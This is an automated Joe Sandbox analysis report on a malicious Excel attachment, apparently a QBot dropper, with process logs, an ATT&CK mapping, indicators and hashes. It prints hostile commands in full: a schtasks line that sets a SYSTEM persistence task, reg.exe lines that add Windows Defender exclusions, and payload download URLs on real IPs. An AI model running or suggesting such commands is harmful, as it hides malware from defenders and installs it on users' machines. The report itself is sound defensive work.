    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Injects code into the Windows Explorer (explorer.exe)
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2592 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2592 base: 9C102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 3060 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 3060 base: 9C102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 536 base: F0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 536 base: 9C102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2100 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2100 base: 9C102D value: E9
    Yara detected hidden Macro 4.0 in Excel
    Source: Yara match | File source: Claim-838392655-09242021.xls, type: SAMPLE
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yiiocubi' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nqsaq' /d '0'
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_000831C2 CreateNamedPipeA,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Command and Scripting Interpreter 11 | Scheduled Task/Job 1 | Process Injection 412 | Masquerading 121 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 12 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | Scripting 2 | Logon Script (Windows) | Logon Script (Windows) | Modify Registry 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | Native API 1 | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 21 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Exploitation for Client Execution 32 | Network Logon Script | Network Logon Script | Process Injection 412 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 2 | Cached Domain Credentials | System Information Discovery 15 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 11 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

    Behavior Graph


    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    Behavior Graph ID: 491203, Sample: Claim-838392655-09242021.xls, Startdate: 27/09/2021, Architecture: WINDOWS, Score: 100

    Signatures on the sample node: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Document exploit detected (drops PE files); 7 other signatures

    Processes started from the sample: EXCEL.EXE (node 9, badges 189 37), regsvr32.exe (node 14), regsvr32.exe (node 16)

    • EXCEL.EXE (node 9)
        • Network: 111.90.148.104, 49166, 80, SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY, Malaysia
        • Network: 190.14.37.173, 49165, 80, OffshoreRacksSAPA, Panama
        • Network: 51.89.115.111, 49167, 80, OVHFR, France
        • Dropped: C:\Users\user\...\44466.4649013889[3].dat, PE32
        • Dropped: C:\Users\user\...\44466.4649013889[2].dat, PE32
        • Dropped: C:\Users\user\...\44466.4649013889[1].dat, PE32
        • Signature: Document exploit detected (UrlDownloadToFile)
        • Started: regsvr32.exe (node 18), regsvr32.exe (node 20), regsvr32.exe (node 22)
    • regsvr32.exe (node 14) started regsvr32.exe (node 24)
    • regsvr32.exe (node 16) started regsvr32.exe (node 27)
    • regsvr32.exe (node 18) started regsvr32.exe (node 29)
    • regsvr32.exe (node 20) started regsvr32.exe (node 32)
    • regsvr32.exe (node 22) started regsvr32.exe (node 34)
    • regsvr32.exe (node 24)
        • Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 2 other signatures
        • Started: explorer.exe (node 36, badges 8 1)
    • regsvr32.exe (node 29)
        • Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions
        • Started: explorer.exe (node 39, badges 8 1)
    • regsvr32.exe (node 32)
        • Signatures: Allocates memory in foreign processes; Maps a DLL or memory area into another process
        • Started: explorer.exe (node 42)
    • regsvr32.exe (node 34) started explorer.exe (node 45)
    • explorer.exe (node 36)
        • Dropped: C:\Users\user\Fiosa.der, PE32
        • Signature: Uses cmd line tools excessively to alter registry or file data
        • Started: reg.exe (node 47, badge 1), reg.exe (node 49, badge 1)
    • explorer.exe (node 39)
        • Signatures: Uses cmd line tools excessively to alter registry or file data; Drops PE files to the user root directory; Uses schtasks.exe or at.exe to add and modify task schedules
        • Started: schtasks.exe (node 51)
    • explorer.exe (node 42) dropped C:\Users\user\Fiosa1.der, PE32
    • explorer.exe (node 45) dropped C:\Users\user\Fiosa2.der, PE32

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    Claim-838392655-09242021.xls | 27% | ReversingLabs | Document-Office.Trojan.Valyria |

    Dropped Files

    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].dat | 29% | Metadefender | | Browse
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].dat | 29% | ReversingLabs | Win32.Infostealer.QBot |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].dat | 29% | Metadefender | | Browse
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].dat | 29% | ReversingLabs | Win32.Infostealer.QBot |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].dat | 29% | Metadefender | | Browse
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].dat | 29% | ReversingLabs | Win32.Infostealer.QBot |
    C:\Users\user\Fiosa.der | 2% | ReversingLabs | |
    C:\Users\user\Fiosa1.der | 2% | ReversingLabs | |
    C:\Users\user\Fiosa2.der | 2% | ReversingLabs | |

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label | Link
    http://www.%s.comPA | 0% | URL Reputation | safe |
    http://111.90.148.104/44466.4649013889.dat | 0% | Avira URL Cloud | safe |
    http://190.14.37.173/44466.4649013889.dat | 0% | Avira URL Cloud | safe |
    http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |
    http://51.89.115.111/44466.4649013889.dat | 0% | Avira URL Cloud | safe |

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://111.90.148.104/44466.4649013889.dat | false | Avira URL Cloud: safe | unknown
    http://190.14.37.173/44466.4649013889.dat | false | Avira URL Cloud: safe | unknown
    http://51.89.115.111/44466.4649013889.dat | false | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.%s.comPA | regsvr32.exe, 00000005.00000002.519787979.0000000002370000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575187514.00000000020D0000.00000002.00020000.sdmp, explorer.exe, 00000008.00000002.906659825.0000000002070000.00000002.00020000.sdmp | false | URL Reputation: safe | low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000005.00000002.519787979.0000000002370000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575187514.00000000020D0000.00000002.00020000.sdmp | false | | high
    http://servername/isapibackend.dll | regsvr32.exe, 00000004.00000002.523226546.0000000001CA0000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.519424175.0000000001E40000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.578213273.0000000001CA0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.574806742.0000000001C10000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

      Contacted IPs


      Public

      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
      190.14.37.173 | unknown | Panama | | 52469 | OffshoreRacksSAPA | false
      51.89.115.111 | unknown | France | | 16276 | OVHFR | false
      111.90.148.104 | unknown | Malaysia | | 45839 | SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | false

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:491203
      Start date:27.09.2021
      Start time:11:09:24
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 15m 37s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:Claim-838392655-09242021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:26
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@33/11@0/3
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 24.6% (good quality ratio 23.3%)
      • Quality average: 77.1%
      • Quality standard deviation: 27.1%
      HCA Information:
      • Successful, ratio: 88%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
      • TCP Packets have been reduced to 100
      • Not all processes where analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.
      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491203/sample/Claim-838392655-09242021.xls

      Simulations

      Behavior and APIs

      Time | Type | Description
      11:10:07 | API Interceptor | 55x Sleep call for process: regsvr32.exe modified
      11:10:08 | API Interceptor | 865x Sleep call for process: explorer.exe modified
      11:10:16 | Task Scheduler | Run new task: pmdfegez path: regsvr32.exe s>-s "C:\Users\user\Fiosa.der"
      11:10:16 | API Interceptor | 1x Sleep call for process: schtasks.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443709384126338
      Encrypted:false
      SSDEEP:6144:8bqzVbbUYjG8AClk8+905KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyunP:OqxgYjG8ACv+iKhpsJZRXH52LMcg5n
      MD5:128C9E74738E40903FC7ADA8627868FE
      SHA1:82BFDBBBCA4DE4D48A27BF0126B3ED02E29F2CDA
      SHA-256:0AC362202467FA5C5C481852D6F5BEEA07FBD0C1A6A67DE96FAB569B0AF6071B
      SHA-512:D6F66AE4257AC3D5442E06977D67C8D031BFFA0F325395ADB0D1CCF90CEBA18BD11C5F97EC3CBBF783F8890E1C72F0ADF44B93DD63D5DA63EC7B5E8E8D13B2BA
      Malicious:true
      Antivirus:
      • Antivirus: Metadefender, Detection: 29%, Browse
      • Antivirus: ReversingLabs, Detection: 29%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a.T.%}:Y%}:Y%}:Y.rZY&}:Y..DY$}:Y..GY>}:Y..TY.}:Y.rdY"}:Y%};Y.}:Y..UYq}:Y..@Y$}:Y..FY$}:Y..CY$}:YRich%}:Y........................PE..L...y_.E...........!.................1...............................................................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443709384126338
      Encrypted:false
      SSDEEP:6144:8bqzVbbUYjG8AClk8+905KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyunP:OqxgYjG8ACv+iKhpsJZRXH52LMcg5n
      MD5:128C9E74738E40903FC7ADA8627868FE
      SHA1:82BFDBBBCA4DE4D48A27BF0126B3ED02E29F2CDA
      SHA-256:0AC362202467FA5C5C481852D6F5BEEA07FBD0C1A6A67DE96FAB569B0AF6071B
      SHA-512:D6F66AE4257AC3D5442E06977D67C8D031BFFA0F325395ADB0D1CCF90CEBA18BD11C5F97EC3CBBF783F8890E1C72F0ADF44B93DD63D5DA63EC7B5E8E8D13B2BA
      Malicious:true
      Antivirus:
      • Antivirus: Metadefender, Detection: 29%, Browse
      • Antivirus: ReversingLabs, Detection: 29%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a.T.%}:Y%}:Y%}:Y.rZY&}:Y..DY$}:Y..GY>}:Y..TY.}:Y.rdY"}:Y%};Y.}:Y..UYq}:Y..@Y$}:Y..FY$}:Y..CY$}:YRich%}:Y........................PE..L...y_.E...........!.................1...............................................................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443709384126338
      Encrypted:false
      SSDEEP:6144:8bqzVbbUYjG8AClk8+905KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyunP:OqxgYjG8ACv+iKhpsJZRXH52LMcg5n
      MD5:128C9E74738E40903FC7ADA8627868FE
      SHA1:82BFDBBBCA4DE4D48A27BF0126B3ED02E29F2CDA
      SHA-256:0AC362202467FA5C5C481852D6F5BEEA07FBD0C1A6A67DE96FAB569B0AF6071B
      SHA-512:D6F66AE4257AC3D5442E06977D67C8D031BFFA0F325395ADB0D1CCF90CEBA18BD11C5F97EC3CBBF783F8890E1C72F0ADF44B93DD63D5DA63EC7B5E8E8D13B2BA
      Malicious:true
      Antivirus:
      • Antivirus: Metadefender, Detection: 29%, Browse
      • Antivirus: ReversingLabs, Detection: 29%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a.T.%}:Y%}:Y%}:Y.rZY&}:Y..DY$}:Y..GY>}:Y..TY.}:Y.rdY"}:Y%};Y.}:Y..UYq}:Y..@Y$}:Y..FY$}:Y..CY$}:YRich%}:Y........................PE..L...y_.E...........!.................1...............................................................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):162688
      Entropy (8bit):4.254391447071874
      Encrypted:false
      SSDEEP:1536:C6pL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CYJNSc83tKBAvQVCgOtmXmLpLm4l
      MD5:D62FF39274099B2D0889AF912D1E1246
      SHA1:D305B171EB1F89BA68D2E893E7C440DE62B3DD4C
      SHA-256:2180128C16E743A610F283BEA5F7D5959DFDD4D41FE7DA814E9193177F1E1B85
      SHA-512:C191DCD8078F2D2821BEBD87B175706D13DB90104320EC7D1BC5CC60F4046592D293AAE34659C781C26A68C298BE6DD53D8FC262E6E77732C74F4DA7E307D6CC
      Malicious:false
      Reputation:unknown
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
      C:\Users\user\Fiosa.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.374053047991689
      Encrypted:false
      SSDEEP:1536:Z2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:bC6MtAAFNJ5XC5SYCi02r+J
      MD5:24298C861294A6FF97FD5F9E282EAA6B
      SHA1:CB95A2379BD8438E8BB81FEA0B69DF54FD5D8711
      SHA-256:D3DECCC9B1CFCE759BC05D4CD90011F4D75FF502E03D6496C267F78B980293E8
      SHA-512:351DA7E48B6CBD56DECCC1C93A5A90E02F355002C7045F41B9DF0C3BC8B487281C0B1914745C4115D566CE5D1F77F6BD34A14766F99FD474AF96BD9614F2EFDB
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 2%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a.T.%}:Y%}:Y%}:Y.rZY&}:Y..DY$}:Y..GY>}:Y..TY.}:Y.rdY"}:Y%};Y.}:Y..UYq}:Y..@Y$}:Y..FY$}:Y..CY$}:YRich%}:Y........................PE..L...y_.E...........!.................1...............................................................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\Fiosa1.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.374053047991689
      Encrypted:false
      SSDEEP:1536:Z2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:bC6MtAAFNJ5XC5SYCi02r+J
      MD5:24298C861294A6FF97FD5F9E282EAA6B
      SHA1:CB95A2379BD8438E8BB81FEA0B69DF54FD5D8711
      SHA-256:D3DECCC9B1CFCE759BC05D4CD90011F4D75FF502E03D6496C267F78B980293E8
      SHA-512:351DA7E48B6CBD56DECCC1C93A5A90E02F355002C7045F41B9DF0C3BC8B487281C0B1914745C4115D566CE5D1F77F6BD34A14766F99FD474AF96BD9614F2EFDB
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 2%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a.T.%}:Y%}:Y%}:Y.rZY&}:Y..DY$}:Y..GY>}:Y..TY.}:Y.rdY"}:Y%};Y.}:Y..UYq}:Y..@Y$}:Y..FY$}:Y..CY$}:YRich%}:Y........................PE..L...y_.E...........!.................1...............................................................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\Fiosa2.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.374053047991689
      Encrypted:false
      SSDEEP:1536:Z2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:bC6MtAAFNJ5XC5SYCi02r+J
      MD5:24298C861294A6FF97FD5F9E282EAA6B
      SHA1:CB95A2379BD8438E8BB81FEA0B69DF54FD5D8711
      SHA-256:D3DECCC9B1CFCE759BC05D4CD90011F4D75FF502E03D6496C267F78B980293E8
      SHA-512:351DA7E48B6CBD56DECCC1C93A5A90E02F355002C7045F41B9DF0C3BC8B487281C0B1914745C4115D566CE5D1F77F6BD34A14766F99FD474AF96BD9614F2EFDB
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 2%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a.T.%}:Y%}:Y%}:Y.rZY&}:Y..DY$}:Y..GY>}:Y..TY.}:Y.rdY"}:Y%};Y.}:Y..UYq}:Y..@Y$}:Y..FY$}:Y..CY$}:YRich%}:Y........................PE..L...y_.E...........!.................1...............................................................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri Sep 24 10:05:02 2021, Security: 0
      Entropy (8bit):7.828791926330867
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:Claim-838392655-09242021.xls
      File size:419328
      MD5:295dbcf85c2baffd99e4670c21afc93c
      SHA1:3dfb83a771615b879d20445ff5e5143d5846de6a
      SHA256:acf0a503e9bdf8a32edfb667776fd159a70f4f9173c01c024c82bb6dd658e451
      SHA512:08337f3aee4df9892271e2dbe70f21644b81b81b52a5659447d98c83bd35e60a9c7229163b42b4f277e1d019b6ed6b607f555ffa432784e44126f5542f117680
      SSDEEP:6144:Fk3hOdsylKlgxopeiBNhZF+E+W2kdAKTwapS+PS82DPz6ST4+e3G0Sb8duSgcVwp:e5Z8etSwuSgcfPwJjxwrcNDTfsXo/xT
      File Content Preview:........................>.......................................................b.......d.......f..............................................................................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "Claim-838392655-09242021.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1251
      Author:Test
      Last Saved By:Test
      Create Time:2015-06-05 18:17:20
      Last Saved Time:2021-09-24 09:05:02
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1251
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576

      Streams with VBA

      VBA File Name: UserForm1, Stream Size: -1
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1
      VBA File Name:UserForm1
      Stream Size:-1
      Data ASCII:
      Data Raw:
      VBA Code
      VBA File Name: Module1, Stream Size: 4112
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Module1
      VBA File Name:Module1
      Stream Size:4112
